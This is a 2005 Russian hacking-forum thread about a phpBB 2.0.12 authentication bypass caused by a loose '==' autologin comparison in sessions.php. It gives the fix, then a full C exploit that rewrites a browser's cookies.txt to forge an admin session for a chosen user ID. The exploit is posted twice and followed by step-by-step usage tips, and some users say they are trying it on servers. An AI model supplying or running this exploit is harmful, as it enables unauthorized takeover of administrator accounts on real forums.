Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.03.2005, 02:08
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Phpbb 2.0.12
Уязвимость в PhpBB позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме.
Уязвимость связана с ошибков в сравнении "sessiondata['autologinid']" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке:
if( $sessiondata['autologinid'] == $auto_login_key )
Условие выполняется, если длина $sessiondata['autologinid'], представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку:
if( $sessiondata['autologinid'] === $auto_login_key )
Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.
http://www.securitylab.ru/52986.html
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
01.03.2005, 12:33
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
блин опередил =\ Добавляю expl
PHP код:
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;
if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");
if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}
strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);
if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}
if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}
|
|
|
|
01.03.2005, 13:48
|
|
Новичок
Регистрация: 26.07.2004
Сообщений: 4
Провел на форуме:
0
Репутация:
0
|
|
Скажи что изменять в куках ?, в ручную это сделать надежнее
|
|
|
|
01.03.2005, 15:39
|
|
Новичок
Регистрация: 01.03.2005
Сообщений: 11
Провел на форуме:
11217
Репутация:
0
|
|
Вроде как эта фишка проходит только на некоторых серверах.
Сейчас буду пробовать...
|
|
|
|
01.03.2005, 15:54
|
|
Новичок
Регистрация: 26.07.2004
Сообщений: 4
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от (-=util=-)
блин опередил =\ Добавляю expl
PHP код:
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;
if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");
if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}
strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);
if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}
if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}
Спиздил код даже копирайтов не оставил засранец
|
|
|
|
01.03.2005, 15:55
|
|
Новичок
Регистрация: 26.07.2004
Сообщений: 4
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от $h@dow
Вроде как эта фишка проходит только на некоторых серверах.
Сейчас буду пробовать...
Не от сервера зависит а от форума и браузера, эксплоит вообще под Мозиллу заточен.
В файле cookies.txt в кеше мозиллы эксплоит заменяет строчки.
Чтоб эксплоит сработал нужно залогиниться с выключенной опцией автологин, потом вырубить браузер, запустить сплоит причем файл cookies.txt должен лежать в одной папке с эксплоитом.
Эксплоит делает равными по длине значения параметров
autologin и autologiтkey поэтому собсвтенно всё и происходит
Удачного результат пока ненашёл
Последний раз редактировалось OvERMiND; 01.03.2005 в 16:02..
|
|
|
|
01.03.2005, 16:19
|
|
Новичок
Регистрация: 01.03.2005
Сообщений: 11
Провел на форуме:
11217
Репутация:
0
|
|
То что от версии форума зависит это понятно.
Но также важную роль играет версия PHP, нормально ли она обрабатывает "==", поскольку некоторые сравняют лишь длинну строк, а остальные работают как strcmp().
|
|
|
|
01.03.2005, 16:37
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
Спиздил код даже копирайтов не оставил засранец
обоср***ся теперь мне  ) попал....
|
|
|
|
01.03.2005, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Я буду баги искать... Должны быть. Ещё нет ни одной версии без багов
|
|
|
|
02.03.2005, 19:16
|
|
Новичок
Регистрация: 26.07.2004
Сообщений: 4
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от (-=util=-)
обоср***ся теперь мне ) попал.... Лол 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
